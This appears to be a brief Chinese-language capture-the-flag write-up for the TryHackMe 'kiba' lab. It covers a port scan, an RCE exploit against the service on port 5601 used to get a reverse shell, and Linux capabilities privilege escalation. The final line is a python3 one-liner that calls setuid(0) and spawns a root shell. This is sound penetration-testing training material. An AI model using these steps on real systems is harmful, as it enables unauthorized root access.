TryHackMe | kiba
信息收集
端口开放
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
5044/tcp open lxi-evntsvc
5601/tcp open esmagent
80端口没看到有什么可利用的,目录扫描也没东西,来看看5601端口
Getshell
发现该框架的版本存在RCE漏洞
使用EXP直接反弹shell了
Capabilities 提权
Capabilities是linux的一种访问控制能力,能够更精细化的将操作系统权限(网络,文件等)赋权给应用程序,其中就包括设置uid和gid的权限。因此具备cap_setuid和cap_setgid权限的程序可以用来进行权限提升
通过getcap -r / 2>/dev/null
查找具有该权限的二进制程序
/home/kiba/.hackmeplease/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'